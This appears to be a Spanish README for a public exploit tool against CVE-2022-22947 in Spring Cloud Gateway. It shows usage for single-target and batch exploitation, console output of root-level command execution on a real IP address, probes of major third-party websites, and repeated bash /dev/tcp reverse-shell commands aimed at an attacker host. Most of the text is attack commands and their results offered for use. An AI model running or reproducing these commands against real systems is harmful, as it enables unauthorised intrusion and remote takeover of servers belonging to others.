
Un script que puede verificar individualmente o en lotes, y también puede generar una reverse shell.
Nivel de peligro: Alto
Estado de POC/EXP: Público
Número CNVD: CNNVD-2022-16402
Número CVE: CVE-2022-22947
Spring Cloud Gateway tiene una vulnerabilidad de ejecución remota de código, que ocurre en el endpoint Actuator de las aplicaciones Spring Cloud Gateway. Cuando está habilitado, expuesto y no seguro, es susceptible a ataques de inyección de código. Un atacante puede explotar esta vulnerabilidad creando de forma maliciosa una solicitud que permita ejecutar código arbitrario en el host remoto.
-h Ver ayuda
-u Especificar la URL del objetivo
-c Especificar el comando a ejecutar (por defecto: id)
-f Especificar archivo con URLs objetivo
1. Verificación de un solo objetivo
Método 1:
E:\pocs>python cve-2022-22947.py
Verificar un solo objetivo:
1. python cve-2022-22947.py Tras entrar en modo interactivo, ingresar la URL objetivo y el comando a ejecutar según las indicaciones. Prestar atención a la corrección del comando.
2. python cve-2022-22947.py -u http://example.com -c whoami
Verificar múltiples objetivos:
1. python cve-2022-22947.py -f url.txt , colocar todas las URLs a verificar en el directorio url.
Reverse shell:
1. python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2. Entrar en modo interactivo, ingresar el objetivo y el comando para reverse shell.
Ingrese la URL objetivo: http://123.58.236.76:8484
Ingrese el comando a ejecutar (por defecto: id): whoami
[+]Objetivo: http://123.58.236.76:8484 , comando obtenido con éxito: ['root\\n']
Método 2:
E:\learn\python\pocs\pocs>python cve-2022-22947.py -u http://123.58.236.76:8484 -c whoami
Verificar un solo objetivo:
1. python cve-2022-22947.py Tras entrar en modo interactivo, ingresar la URL objetivo y el comando a ejecutar según las indicaciones. Prestar atención a la corrección del comando.
2. python cve-2022-22947.py -u http://example.com -c whoami
Verificar múltiples objetivos:
1. python cve-2022-22947.py -f url.txt , colocar todas las URLs a verificar en el directorio url.
Reverse shell:
1. python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2. Entrar en modo interactivo, ingresar el objetivo y el comando para reverse shell.
[+]Objetivo: http://123.58.236.76:8484 , comando obtenido con éxito: ['root\\n']
2. Verificación masiva
E:\learn\python\pocs\pocs>python cve-2022-22947.py -f url.txt
Verificar un solo objetivo:
1. python cve-2022-22947.py Tras entrar en modo interactivo, ingresar la URL objetivo y el comando a ejecutar según las indicaciones. Prestar atención a la corrección del comando.
2. python cve-2022-22947.py -u http://example.com -c whoami
Verificar múltiples objetivos:
1. python cve-2022-22947.py -f url.txt , colocar todas las URLs a verificar en el directorio url.
Reverse shell:
1. python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2. Entrar en modo interactivo, ingresar el objetivo y el comando para reverse shell.
[+]Objetivo: http://123.58.236.76:8484 , comando obtenido con éxito: ['uid=0(root']
[+]Objetivo: http://123.58.236.76:8484 , comando obtenido con éxito: ['uid=0(root']
[+]Objetivo: http://123.58.236.76:8484 , comando obtenido con éxito: ['uid=0(root']
[-]Objetivo: http://www.baidu.com, ¡fallo en la verificación de la vulnerabilidad! ¡Verifique manualmente!
[-]Objetivo: http://www.qq.com, ¡fallo en la verificación de la vulnerabilidad! ¡Verifique manualmente!
[+]Objetivo: http://123.58.236.76:8484 , comando obtenido con éxito: ['uid=0(root']
3. Reverse shell
python cve-2022-22947.py -u http://123.58.236.76:8484 -c "bash -i >& /dev/tcp/xxx.xxx.xxx/65534 0>&1"
image-20220519233354807
image-20220519233429912